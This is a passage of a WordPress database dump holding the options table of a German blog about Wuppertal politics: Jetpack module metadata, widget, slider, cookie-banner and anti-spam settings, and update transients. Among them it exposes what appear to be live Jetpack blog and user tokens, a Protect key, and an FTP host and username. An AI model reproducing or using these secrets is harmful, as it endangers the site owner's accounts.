Performance-Security\";s:25:\"additional_search_queries\";s:34:\"sso, single sign on, login, log in\";}s:32:\"b65604e920392e2f7134b646760b75e8\";a:14:{s:4:\"name\";s:10:\"Site Stats\";s:11:\"description\";s:35:\"Collect traffic stats and insights.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"1\";s:20:\"recommendation_order\";s:1:\"2\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:23:\"Site Stats, Recommended\";s:7:\"feature\";s:20:\"Recommended, Traffic\";s:25:\"additional_search_queries\";s:54:\"statistics, tracking, analytics, views, traffic, stats\";}s:32:\"23a586dd7ead00e69ec53eb32ef740e4\";a:14:{s:4:\"name\";s:13:\"Subscriptions\";s:11:\"description\";s:88:\"Allow users to subscribe to your posts and comments and receive notifications via email.\";s:14:\"jumpstart_desc\";s:126:\"Give visitors two easy subscription options — while commenting, or via a separate email subscription widget you can display.\";s:4:\"sort\";s:1:\"9\";s:20:\"recommendation_order\";s:1:\"8\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:9:\"Jumpstart\";s:25:\"additional_search_queries\";s:74:\"subscriptions, subscription, email, follow, followers, subscribers, signup\";}s:32:\"1d978b8d84d2f378fe1a702a67633b6d\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"b3b983461d7f3d27322a3551ed8a9405\";a:14:{s:4:\"name\";s:15:\"Tiled Galleries\";s:11:\"description\";s:73:\"Display your image galleries in a variety of sleek, graphic arrangements.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"24\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:17:\"Photos and Videos\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:43:\"gallery, tiles, tiled, grid, mosaic, images\";}s:32:\"d924e5b05722b0e104448543598f54c0\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"36741583b10c521997e563ad8e1e8b77\";a:14:{s:4:\"name\";s:10:\"VaultPress\";s:11:\"description\";s:27:\"Backups and security scans.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"32\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:5:\"0:1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:5:\"false\";s:4:\"free\";s:5:\"false\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:20:\"Performance-Security\";s:25:\"additional_search_queries\";s:28:\"vaultpress, backup, security\";}s:32:\"2b9b44f09b5459617d68dd82ee17002a\";a:14:{s:4:\"name\";s:17:\"Site Verification\";s:11:\"description\";s:77:\"Verify your site or domain with Google Search Console, Pinterest, and others.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"33\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"3.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:56:\"webmaster, seo, google, bing, pinterest, search, console\";}s:32:\"5ab4c0db7c42e10e646342da0274c491\";a:14:{s:4:\"name\";s:10:\"VideoPress\";s:11:\"description\";s:68:\"Upload and embed videos right on your site. (Subscription required.)\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"27\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.5\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:5:\"false\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:17:\"Photos and Videos\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:25:\"video, videos, videopress\";}s:32:\"60a1d3aa38bc0fe1039e59dd60888543\";a:14:{s:4:\"name\";s:17:\"Widget Visibility\";s:11:\"description\";s:57:\"Specify which widgets appear on which pages of your site.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"17\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:10:\"Appearance\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:54:\"widget visibility, logic, conditional, widgets, widget\";}s:32:\"174ed3416476c2cb9ff5b0f671280b15\";a:14:{s:4:\"name\";s:21:\"Extra Sidebar Widgets\";s:11:\"description\";s:79:\"Add images, Twitter streams, your site’s RSS links, and more to your sidebar.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"4\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:18:\"Social, Appearance\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:65:\"widget, widgets, facebook, gallery, twitter, gravatar, image, rss\";}s:32:\"28b931a1db19bd24869bd54b14e733d5\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}}}','yes'),(6711,'jetpack_available_modules','a:1:{s:5:\"3.8.1\";a:36:{s:18:\"after-the-deadline\";s:3:\"1.1\";s:8:\"carousel\";s:3:\"1.5\";s:8:\"comments\";s:3:\"1.4\";s:12:\"contact-form\";s:3:\"1.3\";s:20:\"custom-content-types\";s:3:\"3.1\";s:10:\"custom-css\";s:3:\"1.7\";s:21:\"enhanced-distribution\";s:3:\"1.2\";s:19:\"gravatar-hovercards\";s:3:\"1.1\";s:15:\"infinite-scroll\";s:3:\"2.0\";s:8:\"json-api\";s:3:\"1.9\";s:5:\"latex\";s:3:\"1.1\";s:5:\"likes\";s:3:\"2.2\";s:6:\"manage\";s:3:\"3.4\";s:8:\"markdown\";s:3:\"2.8\";s:9:\"minileven\";s:3:\"1.8\";s:7:\"monitor\";s:3:\"2.6\";s:5:\"notes\";s:3:\"1.9\";s:10:\"omnisearch\";s:3:\"2.3\";s:6:\"photon\";s:3:\"2.0\";s:13:\"post-by-email\";s:3:\"2.0\";s:7:\"protect\";s:3:\"3.4\";s:9:\"publicize\";s:3:\"2.0\";s:13:\"related-posts\";s:3:\"2.9\";s:10:\"sharedaddy\";s:3:\"1.1\";s:10:\"shortcodes\";s:3:\"1.1\";s:10:\"shortlinks\";s:3:\"1.1\";s:9:\"site-icon\";s:3:\"3.2\";s:3:\"sso\";s:3:\"2.6\";s:5:\"stats\";s:3:\"1.1\";s:13:\"subscriptions\";s:3:\"1.2\";s:13:\"tiled-gallery\";s:3:\"2.1\";s:10:\"vaultpress\";s:5:\"0:1.2\";s:18:\"verification-tools\";s:3:\"3.0\";s:10:\"videopress\";s:3:\"2.5\";s:17:\"widget-visibility\";s:3:\"2.4\";s:7:\"widgets\";s:3:\"1.2\";}}','yes'),(7134,'finished_splitting_shared_terms','1','yes'),(7135,'WPLANG','','yes'),(7136,'db_upgraded','','yes'),(7168,'ftp_credentials','a:3:{s:8:\"hostname\";s:14:\"www.ollital.de\";s:8:\"username\";s:7:\"ftpolli\";s:15:\"connection_type\";s:3:\"ftp\";}','yes'),(7179,'widget_calendar','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7180,'widget_nav_menu','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7181,'widget_pages','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7183,'widget_sslider_wid','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7198,'jetpack_options','a:10:{s:7:\"version\";s:16:\"3.8.1:1449494284\";s:11:\"old_version\";s:16:\"3.8.0:1448207388\";s:28:\"fallback_no_verify_ssl_certs\";i:0;s:9:\"time_diff\";i:0;s:2:\"id\";i:103078691;s:6:\"public\";i:1;s:9:\"jumpstart\";s:19:\"jumpstart_activated\";s:11:\"master_user\";i:2;s:14:\"last_heartbeat\";i:1451336878;s:20:\"sync_bulk_reindexing\";b:1;}','yes'),(7199,'jetpack_activated','1','yes'),(7200,'jetpack_security_report','a:0:{}','yes'),(7204,'jetpack_log','a:14:{i:0;a:4:{s:4:\"time\";i:1448207419;s:7:\"user_id\";i:2;s:7:\"blog_id\";b:0;s:4:\"code\";s:8:\"register\";}i:1;a:4:{s:4:\"time\";i:1448207455;s:7:\"user_id\";i:2;s:7:\"blog_id\";b:0;s:4:\"code\";s:8:\"register\";}i:2;a:4:{s:4:\"time\";i:1448223464;s:7:\"user_id\";i:2;s:7:\"blog_id\";b:0;s:4:\"code\";s:8:\"register\";}i:3;a:4:{s:4:\"time\";i:1448223512;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:9:\"authorize\";}i:4;a:4:{s:4:\"time\";i:1448224929;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:9:\"authorize\";}i:5;a:5:{s:4:\"time\";i:1448224943;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:6:\"manage\";}i:6;a:5:{s:4:\"time\";i:1448224944;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:10:\"sharedaddy\";}i:7;a:5:{s:4:\"time\";i:1448224944;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:13:\"subscriptions\";}i:8;a:5:{s:4:\"time\";i:1448224944;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:19:\"gravatar-hovercards\";}i:9;a:5:{s:4:\"time\";i:1448224944;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:12:\"contact-form\";}i:10;a:5:{s:4:\"time\";i:1448224944;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:8:\"carousel\";}i:11;a:5:{s:4:\"time\";i:1448224945;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:6:\"photon\";}i:12;a:5:{s:4:\"time\";i:1448224945;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:13:\"related-posts\";}i:13;a:5:{s:4:\"time\";i:1448224946;s:7:\"user_id\";i:2;s:7:\"blog_id\";i:103078691;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:3:\"sso\";}}','no'),(7205,'jetpack_private_options','a:3:{s:8:\"register\";s:76:\"2qDDLR0jsQDC4mkA7DHtCEJBKoJey4uq:m7cJYMTCCeimOjzynNdO38nN8PMVXwJr:1448224064\";s:10:\"blog_token\";s:65:\"@y(F)sPZrxjdyd4(#IB1zUPLMYGUpV8e.QpZsTPy!ftQBwE0DM2lTfSv6o(yx)8)C\";s:11:\"user_tokens\";a:1:{i:2;s:67:\"p(k0uwuE4JWMhlI3sP%)RpFBdf69ty^V.3&@mgPQeuK7Gh0l&4tj@n82@*fKs^2w5.2\";}}','yes'),(7268,'jetpack_unique_connection','a:3:{s:9:\"connected\";i:2;s:12:\"disconnected\";i:0;s:7:\"version\";s:5:\"3.6.1\";}','yes'),(7277,'jetpack_active_modules','a:26:{i:0;s:18:\"after-the-deadline\";i:1;s:12:\"contact-form\";i:2;s:20:\"custom-content-types\";i:3;s:10:\"custom-css\";i:4;s:21:\"enhanced-distribution\";i:5;s:19:\"gravatar-hovercards\";i:6;s:8:\"json-api\";i:7;s:5:\"latex\";i:8;s:5:\"notes\";i:9;s:10:\"omnisearch\";i:10;s:13:\"post-by-email\";i:11;s:7:\"protect\";i:12;s:9:\"publicize\";i:13;s:10:\"sharedaddy\";i:14;s:10:\"shortcodes\";i:15;s:10:\"shortlinks\";i:16;s:5:\"stats\";i:17;s:13:\"subscriptions\";i:19;s:18:\"verification-tools\";i:20;s:17:\"widget-visibility\";i:21;s:7:\"widgets\";i:22;s:6:\"manage\";i:23;s:8:\"carousel\";i:24;s:6:\"photon\";i:25;s:13:\"related-posts\";i:26;s:3:\"sso\";}','yes'),(7283,'jetpack_protect_key','dcd2c55bf3bdfaad661f2b82cd1426380bafe13e','yes'),(7284,'stats_options','a:7:{s:9:\"admin_bar\";b:1;s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:11:\"count_roles\";a:0:{}s:7:\"blog_id\";i:103078691;s:12:\"do_not_track\";b:1;s:10:\"hide_smile\";b:1;s:7:\"version\";s:1:\"9\";}','yes'),(7290,'trusted_ip_header','O:8:\"stdClass\":3:{s:14:\"trusted_header\";s:11:\"REMOTE_ADDR\";s:8:\"segments\";i:1;s:7:\"reverse\";b:0;}','yes'),(7292,'sharing-options','a:1:{s:6:\"global\";a:5:{s:12:\"button_style\";s:8:\"official\";s:13:\"sharing_label\";b:0;s:10:\"open_links\";s:4:\"same\";s:4:\"show\";a:1:{i:0;s:4:\"post\";}s:6:\"custom\";a:0:{}}}','yes'),(7293,'sharing-services','a:2:{s:7:\"visible\";a:3:{i:0;s:7:\"twitter\";i:1;s:8:\"facebook\";i:2;s:13:\"google-plus-1\";}s:6:\"hidden\";a:0:{}}','yes'),(7295,'stats_cache','a:2:{s:32:\"768097316e026bd92b2eb6d5022d951a\";a:1:{i:1450216442;a:3:{i:0;a:4:{s:7:\"post_id\";s:1:\"0\";s:10:\"post_title\";s:9:\"Home page\";s:14:\"post_permalink\";s:32:\"http://www.ollital.de/wordpress/\";s:5:\"views\";s:1:\"7\";}i:1;a:4:{s:7:\"post_id\";s:1:\"2\";s:10:\"post_title\";s:20:\"Politik in Wuppertal\";s:14:\"post_permalink\";s:44:\"http://www.ollital.de/wordpress/sample-page/\";s:5:\"views\";s:1:\"2\";}i:2;a:4:{s:7:\"post_id\";s:2:\"74\";s:10:\"post_title\";s:10:\"Über mich\";s:14:\"post_permalink\";s:42:\"http://www.ollital.de/wordpress/uber-mich/\";s:5:\"views\";s:1:\"1\";}}}s:32:\"b8cbf44a426c7fd3d99a4db5227b19be\";a:1:{i:1450216443;a:0:{}}}','yes'),(7336,'jetpack_protect_blocked_attempts','505','yes'),(7501,'widget_twitter_timeline','a:2:{i:2;a:9:{s:5:\"title\";s:20:\"Follow me on Twitter\";s:5:\"width\";s:0:\"\";s:6:\"height\";i:400;s:11:\"tweet-limit\";i:3;s:9:\"widget-id\";s:18:\"668685831293509632\";s:10:\"link-color\";s:7:\"#f96e5b\";s:12:\"border-color\";s:7:\"#e8e8e8\";s:5:\"theme\";s:5:\"light\";s:6:\"chrome\";a:0:{}}s:12:\"_multiwidget\";i:1;}','yes'),(7516,'jetpack_protect_whitelist','a:0:{}','yes'),(7585,'tablepress_plugin_options','{\"plugin_options_db_version\":32,\"table_scheme_db_version\":3,\"prev_tablepress_version\":\"1.6.1\",\"tablepress_version\":\"1.7\",\"first_activation\":1448279815,\"message_plugin_update\":true,\"message_donation_nag\":true,\"use_custom_css\":true,\"use_custom_css_file\":true,\"custom_css\":\"\",\"custom_css_minified\":\"\",\"custom_css_version\":0}','yes'),(7586,'tablepress_tables','{\"last_id\":4,\"table_post\":{\"1\":363,\"2\":367,\"3\":380,\"4\":400}}','yes'),(7705,'widget_akismet_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7706,'widget_blog_subscription','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7709,'widget_widget_contact_info','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7710,'widget_jetpack_display_posts_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7711,'widget_facebook-likebox','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7712,'widget_wpcom-goodreads','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7713,'widget_googleplus-badge','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7714,'widget_grofile','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7715,'widget_image','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7716,'widget_rss_links','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7717,'widget_wpcom_social_media_icons_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7718,'widget_top-posts','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(7983,'sharedaddy_disable_resources','0','yes'),(7984,'jetpack-twitter-cards-site-tag','','yes'),(8090,'antispam_bee','a:21:{s:9:\"flag_spam\";i:1;s:12:\"email_notify\";i:1;s:14:\"cronjob_enable\";i:0;s:16:\"cronjob_interval\";i:0;s:9:\"no_notice\";i:0;s:15:\"dashboard_count\";i:1;s:15:\"dashboard_chart\";i:1;s:14:\"advanced_check\";i:1;s:12:\"regexp_check\";i:1;s:7:\"spam_ip\";i:1;s:17:\"already_commented\";i:1;s:10:\"time_check\";i:0;s:14:\"always_allowed\";i:0;s:12:\"ignore_pings\";i:0;s:13:\"ignore_filter\";i:0;s:11:\"ignore_type\";i:1;s:14:\"reasons_enable\";i:0;s:14:\"ignore_reasons\";a:0:{}s:12:\"bbcode_check\";i:1;s:14:\"gravatar_check\";i:0;s:11:\"dnsbl_check\";i:1;}','no'),(8631,'smooth_slider_options','a:61:{s:10:\"stylesheet\";s:7:\"default\";s:8:\"autostep\";s:1:\"1\";s:2:\"fx\";s:10:\"scrollHorz\";s:5:\"speed\";s:1:\"7\";s:10:\"transition\";s:1:\"5\";s:8:\"no_posts\";s:1:\"5\";s:8:\"bg_color\";s:7:\"#ffffff\";s:6:\"height\";s:3:\"250\";s:5:\"width\";s:3:\"450\";s:6:\"border\";s:1:\"0\";s:7:\"brcolor\";s:7:\"#dddddd\";s:9:\"prev_next\";s:1:\"1\";s:10:\"goto_slide\";s:1:\"1\";s:8:\"navimg_w\";s:1:\"8\";s:9:\"navimg_ht\";s:1:\"8\";s:10:\"custom_nav\";s:0:\"\";s:14:\"allowable_tags\";s:0:\"\";s:4:\"more\";s:9:\"Read More\";s:13:\"readmorecolor\";s:7:\"#0092E4\";s:10:\"user_level\";s:17:\"edit_others_posts\";s:8:\"noscript\";s:0:\"\";s:9:\"shortcode\";s:1:\"1\";s:16:\"multiple_sliders\";s:1:\"1\";s:3:\"css\";s:0:\"\";s:10:\"title_text\";s:14:\"Featured Posts\";s:10:\"title_from\";s:1:\"0\";s:10:\"title_font\";s:26:\"Arial,Helvetica,sans-serif\";s:12:\"title_fcolor\";s:7:\"#000000\";s:11:\"title_fsize\";s:2:\"20\";s:12:\"title_fstyle\";s:4:\"bold\";s:11:\"ptitle_font\";s:26:\"Arial,Helvetica,sans-serif\";s:13:\"ptitle_fcolor\";s:7:\"#000000\";s:12:\"ptitle_fsize\";s:2:\"14\";s:13:\"ptitle_fstyle\";s:4:\"bold\";s:8:\"img_pick\";a:6:{i:0;s:1:\"1\";i:1;s:16:\"slider_thumbnail\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";}s:9:\"img_align\";s:4:\"left\";s:4:\"crop\";s:1:\"0\";s:8:\"img_size\";s:1:\"1\";s:9:\"img_width\";s:3:\"165\";s:10:\"img_height\";s:3:\"120\";s:10:\"img_border\";s:1:\"1\";s:11:\"img_brcolor\";s:7:\"#000000\";s:12:\"content_font\";s:26:\"Arial,Helvetica,sans-serif\";s:14:\"content_fcolor\";s:7:\"#333333\";s:13:\"content_fsize\";s:2:\"12\";s:14:\"content_fstyle\";s:6:\"normal\";s:12:\"content_from\";s:7:\"content\";s:13:\"content_limit\";s:2:\"20\";s:13:\"content_chars\";s:3:\"300\";s:7:\"preview\";s:1:\"2\";s:9:\"slider_id\";s:1:\"1\";s:9:\"catg_slug\";s:0:\"\";s:10:\"active_tab\";s:1:\"0\";s:8:\"reviewme\";s:10:\"1446096200\";s:5:\"popup\";s:1:\"0\";s:2:\"bg\";s:1:\"0\";s:10:\"image_only\";s:1:\"0\";s:4:\"rand\";s:1:\"0\";s:3:\"ver\";s:1:\"j\";s:4:\"fouc\";s:1:\"0\";s:15:\"disable_preview\";s:1:\"0\";}','yes'),(8967,'CookieLawInfo-0.9','a:43:{s:18:\"animate_speed_hide\";s:3:\"500\";s:18:\"animate_speed_show\";s:3:\"500\";s:10:\"background\";s:4:\"#fff\";s:14:\"background_url\";s:0:\"\";s:6:\"border\";s:4:\"#444\";s:9:\"border_on\";b:1;s:13:\"button_1_text\";s:6:\"Accept\";s:12:\"button_1_url\";s:1:\"#\";s:15:\"button_1_action\";s:27:\"#cookie_action_close_header\";s:20:\"button_1_link_colour\";s:4:\"#fff\";s:16:\"button_1_new_win\";b:0;s:18:\"button_1_as_button\";b:1;s:22:\"button_1_button_colour\";s:4:\"#000\";s:20:\"button_1_button_size\";s:6:\"medium\";s:13:\"button_2_text\";s:9:\"Read More\";s:12:\"button_2_url\";s:32:\"https://www.ollital.de/wordpress\";s:15:\"button_2_action\";s:17:\"CONSTANT_OPEN_URL\";s:20:\"button_2_link_colour\";s:4:\"#444\";s:16:\"button_2_new_win\";b:1;s:18:\"button_2_as_button\";b:0;s:22:\"button_2_button_colour\";s:4:\"#333\";s:20:\"button_2_button_size\";s:6:\"medium\";s:11:\"font_family\";s:7:\"inherit\";s:10:\"header_fix\";b:0;s:5:\"is_on\";b:1;s:19:\"notify_animate_hide\";b:1;s:19:\"notify_animate_show\";b:0;s:13:\"notify_div_id\";s:20:\"#cookie-law-info-bar\";s:26:\"notify_position_horizontal\";s:5:\"right\";s:24:\"notify_position_vertical\";s:6:\"bottom\";s:14:\"notify_message\";s:59:\"Diese Website benutzt Cookies.[cookie_button] [cookie_link]\";s:12:\"scroll_close\";b:0;s:19:\"scroll_close_reload\";b:0;s:20:\"showagain_background\";s:4:\"#fff\";s:16:\"showagain_border\";s:4:\"#000\";s:14:\"showagain_text\";s:24:\"Privacy & Cookies Policy\";s:16:\"showagain_div_id\";s:22:\"#cookie-law-info-again\";s:13:\"showagain_tab\";b:1;s:20:\"showagain_x_position\";s:5:\"100px\";s:4:\"text\";s:4:\"#000\";s:17:\"use_colour_picker\";b:1;s:12:\"show_once_yn\";b:0;s:9:\"show_once\";s:5:\"10000\";}','yes'),(13570,'_site_transient_timeout_browser_6a0ace41cba61b464fd238f210893c93','1450298034','yes'),(13571,'_site_transient_browser_6a0ace41cba61b464fd238f210893c93','a:9:{s:8:\"platform\";s:5:\"Linux\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"46.0.2490.71\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(13572,'category_children','a:1:{i:10;a:2:{i:0;i:7;i:1;i:14;}}','yes'),(13590,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1451383704;s:7:\"checked\";a:4:{s:13:\"twentyfifteen\";s:3:\"1.4\";s:14:\"twentyfourteen\";s:3:\"1.6\";s:14:\"twentythirteen\";s:3:\"1.7\";s:12:\"twentytwelve\";s:3:\"1.9\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}}','yes'),(13591,'site_icon','0','yes'),(13592,'medium_large_size_w','768','yes'),(13593,'medium_large_size_h','0','yes'),(13595,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.4.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.4.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-4.4-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-4.4-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"4.4\";s:7:\"version\";s:3:\"4.4\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1451383696;s:15:\"version_checked\";s:3:\"4.4\";s:12:\"translations\";a:0:{}}','yes'),(13596,'rewrite_rules','a:93:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:57:\"index.php/category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:52:\"index.php/category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:45:\"index.php/category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:27:\"index.php/category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:54:\"index.php/tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:49:\"index.php/tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:42:\"index.php/tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:24:\"index.php/tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:55:\"index.php/type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:50:\"index.php/type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:43:\"index.php/type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:25:\"index.php/type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:51:\"index.php/cookielawinfo/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:61:\"index.php/cookielawinfo/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:81:\"index.php/cookielawinfo/[^/